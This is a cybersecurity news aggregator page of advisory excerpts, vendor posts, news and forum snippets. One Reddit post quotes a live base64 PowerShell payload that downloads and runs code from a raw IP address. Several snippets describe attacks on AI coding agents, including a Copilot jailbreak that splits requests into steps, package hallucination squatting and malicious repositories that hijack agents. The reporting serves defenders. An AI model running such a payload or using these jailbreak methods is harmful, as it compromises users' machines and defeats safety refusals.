Overview PayRange is a mobile payment app that allows users to pay for vending machines, laundromats, and other unattended machines using a smartphone with Bluetooth. Two vulnerabilities were discovered in version 7.0.7 of the PayRange app that is available in the Google Play store. Description A vulnerability (CVE-2026-13462) exists in the PayRange Android app that causes invalid SSL certificates to be accepted in application WebViews. A second vulnerability (CVE-2026-13461) exists that allows the injection of JavaScript, which can be used to escape the WebView sandbox and perform a number of dangerous actions on the user's device. These vulnerabilities were discovered in version 7.0.7 of the PayRange app. The PayRange app bypasses Android's SSL trust chain and accepts certificates that match any of the following rules (including self-signed certificates): Common Name ends with "payrange.com" Common Name contains "stripe.com" Common Name contains "fetlifestatus.com" AND any of these conditions are true: Issuer Common Name is "R10" Issuer Common Name is "R3" Issuer Common Name contains "Network Solutions" The attack vector is an on-path interception. If an attacker can direct traffic intended for a legitimate server to a device they control, they can negotiate a TLS connection with the user's device using any trusted certificate that matches the rule set. They are then able to inject content into the WebView and harvest credentials, issue malicious requests and read data entered by the user, including exchanges with the PayRange and Stripe servers. Impact An attacker may be able to intercept any information they can convince the
Cybersecurity News and Vulnerability Aggregator
Cybersecurity news aggregator
treemd <(curl -sL https://allsec.sh/md) (as Markdown) Top Cybersecurity Stories Today
Ask an AI coding agent to scan open-source code for security holes, and it might run the attacker's code on your own machine instead. That is the finding in a proof-of-concept published Wednesday by the AI Now Institute, an attack it calls "Friendly Fire." It works against Anthropic's Claude Code and OpenAI's Codex when either is running in an autonomous mode that approves its own
VU#849433: Adalo Database API Enables Cross-App User Data Extraction via Over-Fetching and Missing Authorization Controls
Overview Adalo’s no‑code application platform exposes complete user records through its database API for all applications built on both V1 and V2. Due to a platform-level flaw, authenticated users can retrieve full user data belonging to any Adalo application, regardless of configuration. This issue affects more than one million applications and placing developers and their end users at risk of data exposure that they cannot prevent or remediate. Description Adalo is a Software-as-a-Service (SaaS) provider for building no-code applications. In theory, each application or tenant (customer) is logically isolated with separate databases, users, and configurations. CVE-2026-10706 Unrestricted Disclosure of Full User Records The Adalo database API contains a flaw which allows the backend to return complete user records for every list component request, regardless of which fields the component is configured to display. The database does not enforce ownership‑aware, server‑side authorization checks, allowing authenticated users of any Adalo application to query database and table identifiers belonging to other applications and retrieve full records, including fields not requested. This issue is amplified by the permissive CORS policy, plaintext storage of all text files and evidence suggests that deleted records may remain accessible. CVE-2026-10708 Exposure and Reuse of Long-Lived JWT Tokens The JWT tokens are visible in client‑side requests and remain valid for approximately twenty days. Once copied, they can be reused from any external website or script to query the database API directly. Because the platform allows requests from any origin, attackers can repeatedly query the API and extract large volumes of user data without interacting with the applica
Today, the UK government launched the Cyber Resilience Pledge : a voluntary framework inviting organizations to commit to foundational cybersecurity governance, board-level accountability, and comprehensive cybersecurity coverage across supply chains. Cloudflare is proud to join the pledge’s founding cohort of signatories and continue our long-standing work with the Department of Science, Innovation and Technology (DSIT), National Cyber Security Centre, and others to shape a more secure, future-ready digital economy for the UK . The pledge's core pillars — democratizing security, leadership accountability, and radical transparency — have been at the heart of Cloudflare since day one. Instead of approaching this framework as a new set of commitments to meet, we see it as a welcome validation from the UK government of the security philosophy and principles Cloudflare has championed for over a decade. We are glad to see the rest of the industry moving in this direction. This pledge is an important step, and it comes at a time of significant cyber risk. In the first quarter of 2026, Cloudflare's global network blocked an average of 234 billion cyber threats every day . Recently, we mitigated a hyper-volumetric DDoS attack that peaked at 31.4 Tbps . At th
Latest
Datadog Security Labs is warning of "several overlapping campaigns" that are systematically enumerating corporate GitHub organizations, repositories, and user accounts through the GitHub API. "Operators rely on automated scraping tooling with custom or legitimate-sounding user agents, leveraging GitHub 'ghost' accounts that are often years old, or compromised OAuth tokens and personal
Security testing identifies vulnerabilities, weaknesses, and misconfigurations before attackers can exploit them. This guide covers every major method, when to use each, and how to build a program that finds what actually matters. The post What Is Security Testing? A Practitioner’s Guide to Methods, Tools, and When to Use Each appeared first on Synack .
Microsoft has taken apart a destructive Windows backdoor it calls GigaWiper. What stands out is how it is built: not one tool but three older destructive programs bolted into one, offered as commands the operator can choose from. Each is a different way to break a machine: wipe the whole disk, overwrite the Windows drive, or run fake "ransomware" that scrambles files with a key it never saves
Overview PayRange is a mobile payment app that allows users to pay for vending machines, laundromats, and other unattended machines using a smartphone with Bluetooth. Two vulnerabilities were discovered in version 7.0.7 of the PayRange app that is available in the Google Play store. Description A vulnerability (CVE-2026-13462) exists in the PayRange Android app that causes invalid SSL certificates to be accepted in application WebViews. A second vulnerability (CVE-2026-13461) exists that allows the injection of JavaScript, which can be used to escape the WebView sandbox and perform a number of dangerous actions on the user's device. These vulnerabilities were discovered in version 7.0.7 of the PayRange app. The PayRange app bypasses Android's SSL trust chain and accepts certificates that match any of the following rules (including self-signed certificates): Common Name ends with "payrange.com" Common Name contains "stripe.com" Common Name contains "fetlifestatus.com" AND any of these conditions are true: Issuer Common Name is "R10" Issuer Common Name is "R3" Issuer Common Name contains "Network Solutions" The attack vector is an on-path interception. If an attacker can direct traffic intended for a legitimate server to a device they control, they can negotiate a TLS connection with the user's device using any trusted certificate that matches the rule set. They are then able to inject content into the WebView and harvest credentials, issue malicious requests and read data entered by the user, including exchanges with the PayRange and Stripe servers. Impact An attacker may be able to intercept any information they can convince the
GitHub has officially announced the release of npm version 12 with install scripts disabled by default, along with deprecating granular access tokens (GATs) designed to bypass two-factor authentication (2FA). The Microsoft-owned subsidiary noted that the following npm install behaviors that used to run automatically before have been made opt-in - allowScripts defaults to off, meaning
Hi everyone, I've recently released **Auditor 1.0.0**, a command-line utility for file hashing and integrity verification, and I'd like to share some of the new features that may be useful for digital forensics workflows. # New: Verified file copy Two new commands have been added to perform file copies while ensuring end-to-end integrity. **clone** * Reads each source file and computes its hash. * Copies the file to the destination. * Reads the copied file, recomputes its hash, and verifies it against the source. * Can also generate audit/hash files if they don't already exist. **chkcopy** Similar to `clone`, but additionally validates the source against previously generated audit files before copying: * Verifies that the audit files exist. * Recomputes the source hash and compares it with the recorded value. * Copies the file. * Verifies the copied file by hashing it again and comparing it with the source. Both commands support configurable retry logic (number of attempts and delay between retries), which is particularly useful when copying over network shares where transient I/O or connection failures may occur. # Compatibility with existing checksum tools Auditor can now verify checksum files generated by other utilities, including: * `fsum` * `sha256sum` * `b3sum` * and others This makes it easier to integrate Auditor into existing workflows without requiring proprietary hash lists. # Multiple hash encodings Besides the traditional hexadecimal (Base16) representation, Auditor now supports: * Base32 * Base64 * Base85 This is handy when working with systems that exchange hashes in different encodings (for example, some forensic monitoring systems that use Base32). # Windows, Linux and macOS Precompiled binaries are available for Windows, Linux and macOS. The Linux build has also been updated to run cleanly under **WSL (Windows Subsystem for Linux)**, which may be useful for investigators who automate their workflow with Linux shell scripts while working on Windows. Documentation and downloads: [https://thash.org/auditor](https://thash.org/auditor) # Breaking change in v1.0.0 The default behavior has changed. Previous versions enabled the **thash** method by default. Starting with **v1.0.0**, Auditor computes standard hashes by default, producing exactly the same values as tools such as `sha256sum`, `b3sum`, and `fsum`. The **thash** algorithm is still available, but it must now be explicitly enabled with: `-t` or `--thash` This change was made to improve interoperability while keeping thash available for situations where faster integrity verification of very large datasets is desirable. Feedback, bug reports and feature suggestions are always welcome.
Hi - human contribution here. I'm the creator and maintainer of the SOF-ELK platform. It's a 100% free and open-source implementation of the Elastic Stack, with several hundred parsers, corresponding dashboards, and numerous scripts and integrations that make it all work. It supports both live data consumption via Elastic Beats and syslog (security operations model) and from static files/logs via the local filesystem (forensic model). The platform is distributed as both a natively bootable VM (both x86 and ARM), as well as via an Ansible playbook that allows you to deploy an installation on your own metal or cloud infrastructure. The vitals and download links are here: [http://for572.com/sof-elk-readme](http://for572.com/sof-elk-readme) and the instructions for an Ansible build here here: [https://for572.com/sof-elk-ansible](https://for572.com/sof-elk-ansible) The platform was originally built to complement my SANS FOR572 course, but this is a fully public resource and anyone can use it for operational, educational, testing, etc purposes. This latest version is now built on Ubuntu 26.04 and incorporates a bunch of backend updates to improve ingest speed, user experience, and parser/dashboard coverage. Each release can also be upgraded in the field without needing a new VM download. (Internet access is required for these updates.) But that means you get new and updated parsers, Kibana dashboards, and more - even between major releases like this one. I hope you find it useful!
Most security mess starts as admin work. A link gets clicked. A tool gets trusted. A bucket name gets reused. A setting stays loose because nobody wants to touch it. This week is full of that kind of damage. Not loud. Not clever. Just small gaps doing big jobs. The worst part is how normal it all looks until the bill arrives. The full ThreatsDay list is below. Global
RSA and ECC, cryptographic algorithms that we’ve all relied on for decades, are vulnerable to the attack of sufficiently advanced quantum computers. Such quantum computers do not exist yet, but they seem to be coming sooner than expected. Luckily, the solution is already available: migrate to ML-KEM encryption and ML-DSA signatures, which are designed to be resistant to quantum attack. They were standardized in 2024 by the U.S. National Institute of Standards and Technology (NIST) after an eight-year open international competition. The migration to post-quantum cryptography is in full swing now. At the time of writing, the majority of traffic handled by Cloudflare is already using ML-KEM encryption, and is thus secured against the threat to data posed by harvest-now-decrypt-later attacks. But encryption is only one part of the equation: to be fully secure against quantum computers capable of breaking classical cryptography, we aim to deploy post-quantum signatures to protect authentication systems from unauthorized access. We are targeting 2029 for Cloudflare to be fully post-quantum secure. ML-DSA, the best all-around post-quantum signature scheme standardized today, has its downsides: it’s much larger on the wire, and many tricks we were able to perform with RSA and ECC simply cannot be done with ML-DSA. There are better post-quantum signature schemes on the horizon: last month, NIST announced that it is advancing nine
A Majority of European Lawmakers Voted Against Letting Big Tech Read Our Messages. They’re Going to Anyway
Companies will once again be allowed to scan citizens’ personal texts, emails, and social media messages via the “Chat Control” bill to find child abuse material online.
Overview Two vulnerabilities have been discovered in Xerte Online Toolkits, an open-source e-learning authoring toolsuite intended for the creation of learning materials within a web browser. CVE-2026-14261 tracks the persistence of the /setup/ directory after installation, which allows an unauthenticated attacker to reconfigure the application to point to a remote database they control in order to gain administrative access. CVE-2026-12116 tracks an editable antivirus binary path that can be redirected to a PHP interpreter, causing uploaded files to be executed as PHP code and resulting in remote code execution (RCE). Version v3.15.5 or v3.14.6 of Xerte Online Toolkits fixes these vulnerabilities. Description Xerte Online Toolkits is a suite of a free, open-source e-learning authoring tools that allows users to make educational materials directly in-browser. The toolset is installed from multiple packages, and creates a setup folder that persists after installation. CVE-2026-14261 A vulnerability in Xerte Online Toolkits allows for authentication bypass and remote code execution via reinstallation through the /setup/ folder, enabling attackers to reinstall the service to a remote database they control. CVE-2026-12116 A vulnerability in Xerte Online Toolkits allows for RCE through the antivirus binary path in the tools server settings. The antivirus binary runs on all uploaded files, but the path to the binary can be modified using the configuration menu. An attacker can achieve remote code execution by redirecting the path to a PHP interpreter, causing any uploaded PHP scripts to be executed. During installation, Xerte creates a /setup/
Everyone seems to have announced a clearinghouse over the past few weeks. We did too. Ours is called Athena, and the main thing that sets it apart is that it was already real and running when we announced it — built quietly months earlier, heads down, taking findings and shipping fixes, because customers kept asking us to. We only announced it now because everyone else started announcing theirs,
Google is indexing pornographic PDF spam on multiple .gov domains (Woodway, TX and NYC Council) possible SEO spam or compromised uploads?
If you search: site:[woodwaytexas.gov](http://woodwaytexas.gov/) xxx Google returns dozens of PDF results hosted on the City of Woodway’s official .gov domain with titles such as: “New XXX Sex Videos…” “Pornhub…” “XNXX…” etc. Likewise, searching: site:[council.nyc.gov](http://council.nyc.gov/) xxx returns similar PDF results hosted on the NYC Council’s official .gov domain. The main websites themselves appear to function normally, but Google has indexed these PDFs. **Edit:** I’ve also found similar results on: [louisiana.gov](http://louisiana.gov/) [lacity.gov](http://lacity.gov/) These domains also appear to have the same issue. There are likely many more affected sites.
Cybersecurity researchers have flagged a new ransomware family called GodDamn that employs the PoisonX kernel driver to neutralize security software as part of its defense evasion strategy. According to a new report published by the Threat Hunter Team from Symantec, the ransomware was first publicly spotted in the wild on May 21, 2026. It's assessed to be a rebrand of the Beast ransomware,
[https://medium.com/walmartglobaltech/spectrepaste-b20bc2f6ded8](https://medium.com/walmartglobaltech/spectrepaste-b20bc2f6ded8)
An MSG database tracked and categorized hundreds of celebs, famous Knicks superfans, and even some of Taylor Swift’s wedding guests. Labels included “LGBTQIA,” “DO NOT HOST,” and low to high “risk.”
The security refresh resolves 13 use-after-free bugs, including two critical-severity flaws found by Google. [https://www.securityweek.com/chrome-150-update-patches-27-vulnerabilities/](https://www.securityweek.com/chrome-150-update-patches-27-vulnerabilities/)
Microsoft has released security updates for a Defender vulnerability known as RoguePlanet, nearly a month after details of the flaw became public. The vulnerability, tracked as CVE-2026-50656 (CVSS score: 7.8), is a privilege escalation issue in the Microsoft Malware Protection Engine ("mpengine.dll"), which provides scanning, detection, and cleaning capabilities for its antivirus and
Meta has announced that its new artificial intelligence (AI) model Muse Image lets people use public Instagram posts and reels to generate AI content, and it's enabled by default. "You can also @-mention Instagram accounts in the Meta AI app to bring specific Instagram profiles right into your images," the social media giant said in a post. "Whether you want to design a custom event invitation
Ask an AI coding agent to scan open-source code for security holes, and it might run the attacker's code on your own machine instead. That is the finding in a proof-of-concept published Wednesday by the AI Now Institute, an attack it calls "Friendly Fire." It works against Anthropic's Claude Code and OpenAI's Codex when either is running in an autonomous mode that approves its own
Researchers at Wiz found that a flaw in six popular AI coding assistants lets a booby-trapped code project quietly take control of a developer's computer. The assistant asks permission to edit one harmless-looking file, but the write lands on a sensitive one instead. The affected tools are Amazon Q Developer, Anthropic's Claude Code, Augment, Cursor, Google Antigravity, and Windsurf.
Cybersecurity researchers have disclosed details of a new threat actor dubbed Lurking Lizard that has been operating an end-to-end malicious residential proxy business using an infrastructure comprising more than 230 lookalike domains. The activity dates back to at least August 2022, according to DNS threat intelligence firm Infoblox. Once such campaign, observed earlier this year, involved the
CVE-2026-25262 Write-What-Where in Qualcomm Sahara confirmed on Snapdragon 8 Gen 1 (SM8450) – partial Firehose auth bypass
Our 2026 State of Vulnerabilities Report surfaces what Synack finds in tested customer environments. At a recent webinar, two of our most decorated researchers from the Synack Red Team describe the threat landscape they’re seeing beyond the report findings. Here's what the data shows, what practitioners have experienced, and what your security program should do about the gap. The post The 2026 State of Vulnerabilities: What the Data Misses, According to Our Red Team appeared first on Synack .
AI coding assistants have a habit of making things up. Ask one to fetch a popular tool, and it will sometimes hand back a real-sounding name for a project that does not exist. New research, which its authors call HalluSquatting, turns that habit into an attack: work out the fake names an AI reliably invents, register them first, and wait for the assistant to fetch your trap on a user's
Ubiquiti has shipped updates to address multiple critical security flaws impacting UniFi Connect, UniFi Talk, UniFi Access, UniFi Protect, and UniFi OS that could result in privilege escalation and arbitrary command execution. The list of vulnerabilities is as follows - CVE-2026-50746 (CVSS score: 10.0) - An improper access control vulnerability in UniFi Connect Application that an attacker
VU#849433: Adalo Database API Enables Cross-App User Data Extraction via Over-Fetching and Missing Authorization Controls
Overview Adalo’s no‑code application platform exposes complete user records through its database API for all applications built on both V1 and V2. Due to a platform-level flaw, authenticated users can retrieve full user data belonging to any Adalo application, regardless of configuration. This issue affects more than one million applications and placing developers and their end users at risk of data exposure that they cannot prevent or remediate. Description Adalo is a Software-as-a-Service (SaaS) provider for building no-code applications. In theory, each application or tenant (customer) is logically isolated with separate databases, users, and configurations. CVE-2026-10706 Unrestricted Disclosure of Full User Records The Adalo database API contains a flaw which allows the backend to return complete user records for every list component request, regardless of which fields the component is configured to display. The database does not enforce ownership‑aware, server‑side authorization checks, allowing authenticated users of any Adalo application to query database and table identifiers belonging to other applications and retrieve full records, including fields not requested. This issue is amplified by the permissive CORS policy, plaintext storage of all text files and evidence suggests that deleted records may remain accessible. CVE-2026-10708 Exposure and Reuse of Long-Lived JWT Tokens The JWT tokens are visible in client‑side requests and remain valid for approximately twenty days. Once copied, they can be reused from any external website or script to query the database API directly. Because the platform allows requests from any origin, attackers can repeatedly query the API and extract large volumes of user data without interacting with the applica
Presently sponsored by: Report URI: Guarding you from rogue JavaScript! Don’t get pwned; get real-time alerts & prevent breaches #SecureYourSite How's this for a location?! I mean, last week was nice with Scott in Mallorca, but Marrakech is, well, wow Anyway, about those data breaches... This week I'm talking about the futility of attempting to remove piss from a pool , yet here we are, with various companies wanting to place that message alongside the very data breaches they can do nothing about! As I say in the post, I don't question the good intentions behind setting up a service to try to scrub data from legally operating data brokers, but the marketing machines behind those organisations that regularly reach out to me for product placement don't really seem to grasp that reality. At least now they have a nice explainer courtesy of that post
A recent EvilTokens campaign targeting businesses across the US and Europe is exposing a new email security blind spot. This “ghost phishing” technique keeps the malicious page hidden until it decrypts and comes to life inside the victim’s browser. For security leaders, the risk is clear: traditional URL checks may miss the attack while Microsoft 365 access, sensitive data, and response time
Many internal services at Cloudflare need to read and modify the same control-plane state from across our 330+ global data centers. They need guarantees that different readers never see inconsistent state, and that the system remains available for writes even when some data centers or links fail. But Cloudflare’s network runs across the entire Internet, and the Internet is an unpredictable place. Servers and data centers go down. Queues fill up. Links and cables get cut. These conditions make it difficult to run a globally available data system that guarantees strong consistency (e.g., that all readers are guaranteed to read all prior writes) because hostile conditions hinder distributed system replicas’ ability to reliably synchronize data with one another. One way to synchronize data safely despite adverse network conditions is via a consensus algorithm, which allows a set of machines to agree on the same sequence of values, such as key-value store put and get operations, as long as a majority remains alive and able to communicate. Unfortunately, commonly deployed consensus algorithms like Raft suffer in wide-area networks like Cloudflare’s because they rely on leaders and timeouts . The leader is the only replica allowed to make writes, and if it fails due to a crash or network degradation, the system becomes unavailable until some other replica times out and a new leader is elected. And these timeout values are hard to configure in networks with unpredictable latencies. We have experienced multiple incidents caused by unavailable leaders in consensus-driven systems. And so, for the past year, Cloudflare’s Research team has been building a new distributed consensus service called Meerkat powered by a consensus algorithm called
A new banking fraudulent operation is targeting customers of Mexican banks, fintech, payment processors, and cryptocurrency exchanges using ClickFix lures. The activity cluster, tracked by Elastic Security Labs under the moniker REF6045, involves infecting victims through fake CAPTCHA verification pages that deceive them into running a malicious command that installs a PowerShell toolkit dubbed
A cybersecurity startup dangling millions of dollars to acquire zero-day security vulnerabilities in popular software is run by a pair of far-right conspiracy theorists and convicted felons whose most recent ventures included fake intelligence companies and a now-defunct AI-based lobbying platform they operated under assumed names. The X/Twitter account IRIS C2 (@C2IRIS) has gained more than 4,000 followers since its creation in January 2025, posting frequently about security vulnerabilities, AI and software exploits. IRIS C2 says it is a company in McLean, Va. that sells offensive cybersecurity capabilities. The IRIS C2 website dangles the possibility of million-dollar payouts for exploits to attract talent. “Our business model is this,” reads a pinned post on top of the IRIS C2 account on X. “Attract the very best vulnerability researchers and exploit developers in the world to join our company. This mostly revolves around junior engineers with raw talent/extremely high IQ. We don’t care if they have a college degree/industry experience.” The website linked in that profile — irisc2[.]com — says the company is hiring for a number of open positions, and a recent post on its LinkedIn page enthuses about an overwhelming number of appli
New research shows that a signed Git commit's hash is not the one-of-a-kind name that much of the software world assumes it to be. Given any signed commit, someone without the signing key can mint a second commit with the same files, author, and date, and a valid signature, GitHub still stamps "Verified." Everything a reviewer would check matches. The commit's hash does not. That matters
For years, account takeover (ATO) followed a predictable script. Attackers bought stolen credentials in bulk, ran them through automated tools, and waited for matches. Credential stuffing was cheap, scalable, and for defenders, relatively well understood. That era is ending. Not because attackers gave up, but because the front door finally got harder to kick in. Passkeys are now mainstream.
An AI coding assistant that refuses to answer a dangerous request in its chat box can answer it anyway if the same request is broken into small, ordinary-looking steps inside a code editor. That is the finding of a new study of GitHub Copilot by researchers Abhishek Kumar and Carsten Maple. The models they tested through Copilot, Claude from Anthropic, and Gemini from Google, refused
In April we released Mewt , our open-source mutation-testing engine that finds the gaps in your test suite. Today we’re expanding it with support for DAML, the language Canton Network applications are written in. Mewt now reads DAML, generates several classes of mutants (including two built for DAML’s authorization primitives), and runs them through your existing test suite to count how many mutants survive. If you want to try it, simply install Mewt from the repository , point a mewt.toml at your project and its test command, and use mewt run . For a team shipping DAML to production, that count is what a passing test run is actually worth: it puts a number on how much your suite checks, whereas a green run on its own does not. Why DAML’s coverage reports lie Test coverage is the most reassuring lie in smart-contract development. Hitting 100% line coverage tells you the test runner walked the code; it does not tell you whether any test would fail if that code stopped doing what it is supposed to. We have been grading test harnesses by how many mutants they kill since at least 2019 , and our primer on finding the bugs your tests don’t catch shows how a green suite can still miss the bug that matters. DAML’s built-in coverage measures execution at the template and choice level: which templates were created and which choices were exercised over the test run. It reports whether each ch
Scammers are hijacking government websites to upload ads for “leaked” OnlyFans content. Thousands of copyright complaints from adult creators are helping people avoid malicious links.
Burst water mains. Evacuated hospitals. In a closed-door simulation, insurers played out their response to a mass disruption by China’s Volt Typhoon hackers—and found a nightmare scenario.
Your client is no longer just buying your security advice. They’re auditing whether you live by it. That was a clear message from my exclusive interview with Heather MacDonald Alford, an MSP finance specialist and owner of Counting Creators. Heather’s exactly the kind of customer MSPs should be paying attention to. She’s informed, commercially minded, and willing to challenge vendors to […] The post Cyber-Aware Customers Are Raising the Bar for MSPs and Other Vendors appeared first on Heimdal Security Blog .
Advanced Loader Analysis: Module Stomping, CFG Bypass & COM Hijacking (Shellhost, amsi, mstscax, clbcatq)
The Investigation Bureau has cracked a case involving the Chinese Communist Party's cyber army, "Xiamen Female ○○ Information Technology Co., Ltd.," which impersonated international journalists to conduct social engineering attacks against political and academic figures in my country.
Datadog Security Research has tracked multiple coordinated campaigns enumerating GitHub organizations, repositories, and users through the public GitHub API, abusing leaked access tokens, and cloning private repositories.
I have built NinjaDBG, a full-featured Linux debugger developed from scratch using C++ and Capstone, featuring anti-detection techniques and a polished CLI. Additionally, I created nyx, an ultra-lightweight and headless C decompiler similar to Ghidra written in C++20. Any support to continue the dev
Today, the UK government launched the Cyber Resilience Pledge : a voluntary framework inviting organizations to commit to foundational cybersecurity governance, board-level accountability, and comprehensive cybersecurity coverage across supply chains. Cloudflare is proud to join the pledge’s founding cohort of signatories and continue our long-standing work with the Department of Science, Innovation and Technology (DSIT), National Cyber Security Centre, and others to shape a more secure, future-ready digital economy for the UK . The pledge's core pillars — democratizing security, leadership accountability, and radical transparency — have been at the heart of Cloudflare since day one. Instead of approaching this framework as a new set of commitments to meet, we see it as a welcome validation from the UK government of the security philosophy and principles Cloudflare has championed for over a decade. We are glad to see the rest of the industry moving in this direction. This pledge is an important step, and it comes at a time of significant cyber risk. In the first quarter of 2026, Cloudflare's global network blocked an average of 234 billion cyber threats every day . Recently, we mitigated a hyper-volumetric DDoS attack that peaked at 31.4 Tbps . At th
Continuing our journey through Sentinel ingestion cost reduction, this part focuses on one of the most expensive log sources: firewalls, and more specifically, network traffic events. Network traffic logs from firewalls are highly voluminous and often become the largest contributor to data ingestion costs. At the same time, they remain a valuable source of information during Incident Response or while developing Threat Detection use cases, as they provide a centralized view of network activity across the environment. T
Overview In the first installment of this series , I walked through how I leveraged large language models to assist in identifying several vulnerabilities in the FreeBSD kernel, including a stack-based buffer overflow assigned CVE-2026-3038 . This raised a natural follow-up question. Can language models effectively write exploits for memory corruption vulnerabilities? This article explores that question. I’ll detail two exploit chains I developed that achieve a full escape from a FreeBSD jail environment. The first chain pairs a stack-based buffer overflow with a stack-based information leak to defeat both stack canaries and KASLR. The second takes a different path, combining a heap-based buf
New OST2 class: "Architecture 1901: From zero to QEMU - A Gentle introduction to emulators from the ground up!"
This free class by Antonio Nappa of Fuzz Society builds up your knowledge from learning a toy 8-bit CPU architecture all the way to understanding how QEMU can emulate that architecture. Using this knowledge you can then understand how QEMU can emulate any architecture! Based on beta testing, this class takes an average of 8h47m to complete, and a median of 7h26m.
Today we are launching Workers Cache : a tiered cache that sits in front of your Worker, configured by a single line of Wrangler config and the same Cache-Control headers you already know. When Workers Cache is enabled, every cacheable request to your Worker hits Cloudflare's cache first. If there's a fresh cached response, Cloudflare returns it directly — your Worker doesn't run, and you don't pay CPU time for it. On a miss, your Worker runs, and if your response is cacheable, Cloudflare stores it for the next request. The next request from anywhere on Earth can be served straight from cache. The whole thing is one config block: { "name": "my-worker", "main": "src/index.ts", "compatibility_date": "2026-05-01", "cache": { "enabled": true } } After that, you control caching the way HTTP has always wanted you to — by setting headers on your responses: return new Response(body, { headers: { "Cache-Control": "public, max-age=300, stale-while-revalidate=3600", "Cache-Tag": "products,product:123", }, }); And when content changes, your Worker purges its own cache: await ctx.cache.purge({ tags: ["product:123"] }); That's the whole API. There is no zone to configure, no rules engine to set up, no separate cache to provision, and no second product to log into. The Worker's code is the configuration surface, and the cache follows the Worker wherever it runs — on a custom domain, on workers.dev , behi
The Office of Professional Responsibility has opened more than 100 cases over what ICE officials call “incidents of doxing and threats” against ICE employees.
Porting the functionality of dnscmd.exe into (slightly) more OPSEC safe Beacon Object Files (BOFs) so you can get domain admin rights when you manage to impersonate a user that is a member of the DnsAdmins group, or if using dnscmd.exe simply isn’t an option.
To reduce the amount of noise from questions, we have disabled self-posts in favor of a unified questions thread every week. Feel free to ask any question about reverse engineering here. If your question is about how to use a specific tool, or is specific to some particular target, you will have better luck on the [Reverse Engineering StackExchange](http://reverseengineering.stackexchange.com/). See also /r/AskReverseEngineering.
https://preview.redd.it/xfm8scpfyjbh1.png?width=1240&format=png&auto=webp&s=cc1fc0bbeaca4dfd7aee75951f8ec61070e262bf Sharing some lessons from a challenging forensic PCAP analysis: 1. Map the C2 protocol first. Understanding how the attacker communicates tells you what to expect in every packet. 2. Encryption keys aren't always what they look like. A hex string can be interpreted multiple ways — raw bytes, UTF‑8 encoding, even UTF‑16. If your decrypted output is garbage, ask yourself whether you're using the right form of the key. 3. Responses matter as much as requests. In encrypted C2 channels, the server sends back just as much intel as the attacker sends up. 4. Gzip inside base64 inside C# inside AES. It sounds absurd, but nesting is a real obfuscation pattern. 5. Check file‑creation side effects. Sometimes the payload writes a file you can use as a decryption key elsewhere. If you're getting into forensics CTFs, grab a PCAP with at least 4k packets and try to reconstruct the full timeline — it's a different beast from Jeopardy‑style challenges.
This post continues and concludes our series on Agent ID, by outlining steps that an administrator or security team can take to secure blueprints and agent identities created in their local Entra ID tenant.
Plus: Alleged Scattered Spider hacking member extradited, dozens of license plate reader errors, and Indian officials are concerned about WhatsApp’s username rollout.
https://be nrankwhence.com/preland/av/mc-af/6/index.html? Space added to make the link invalid. 0/10, don't recommend navigating to that website.
Our latest McAfee Labs research exposes a browser extension campaign that poses as a harmless note-taking tool while silently hijacking crypto transactions. The malware tampers with Chrome/Edge/Brave’s trust mechanisms to install without consent, resolves its command-and-control server via a blockchain smart contract (EtherHiding) to evade takedown, and swaps copied wallet addresses with attacker-controlled ones across BTC, ETH, XRP, BCH, and DASH — turning a routine copy-paste into an irreversible loss. Full technical breakdown and IOCs inside
[they are getting smarter](https://preview.redd.it/d40lwwsmv1bh1.png?width=1407&format=png&auto=webp&s=deb513ded2423277ed3a8437e1d3763dc138d62c) this is what the script copied to my clipboard. funny that this website was opened for the first time, yet chrome gave it clipboard permission. lol iex(\[Text.Encoding\]::ASCII.GetString(\[Convert\]::FromBase64String('SW52b2tlLVdlYlJlcXVlc3QgJ2h0dHA6Ly8xNjYuMS44OS45MS9fLycgLVVzZUJhc2ljUGFyc2luZyB8IEludm9rZS1FeHByZXNzaW9u')))
Most breaches don’t start with a vulnerability nobody knew about. They start with one nobody patched in time. Vulnerability exploitation is now the single biggest way attackers get into a network. It has overtaken stolen credentials for the first time in the 19-year history of Verizon’s Data Breach Investigations Report, with 31% of breaches now […] The post How to scale your patches without scaling your team (the patch wave) appeared first on Heimdal Security Blog .
Claude Mythos, an AI model from Anthropic, has found 23,019 software vulnerabilities in the past month. Fewer than 1% of them have been patched. That gap is the story. Finding a vulnerability used to be the hard part, the thing that limited how fast software got fixed. AI just closed that gap to almost nothing. […] The post AI didn’t break patching. It showed us patching was already broken. appeared first on Heimdal Security Blog .
I have turned on my mac in the morning and got this message? Facts or Cap? https://preview.redd.it/kb4sv0aewyah1.png?width=1156&format=png&auto=webp&s=c1db885a6f856d112f9bb3918583af5c51a4a64a
Presently sponsored by: Report URI: Guarding you from rogue JavaScript! Don’t get pwned; get real-time alerts & prevent breaches #SecureYourSite I can't recall if someone else originally came up with this saying or if I said it in some off-the-cuff comment and it just propagated, but since it's often attributed back to me , I'll relay it here regardless: Trying to delete yourself from the internet is like trying to take piss out of a swimming pool Depending on the publication, I'll tailor the saying to be either more broadly palatable or more, uh, "Australian", but the sentiment doesn't change: once data spreads on the internet, you can never put a lid on it. This is important in the context of data breaches because it speaks to the immutability of our exposed personal information. It also speaks to the limited practicality of services that promise to erase your data from the internet, and it's the constant outreach from these organisations looking for marketing opportunities on Have I Been Pwned (HIBP) that's prompted me to write this. Let's begin with those services, and because there are so many and I don't want to throw any of them under the bus, I won't name names. I also won't name them because whilst they're rather assertive in their marketing outreach, I do believe they're well-intentioned and I don't want to imply otherwise. And they have a role to play; it's ju
“It is a direct attack on the rule of law,” says one European Parliament member of the new findings from Citizen Lab.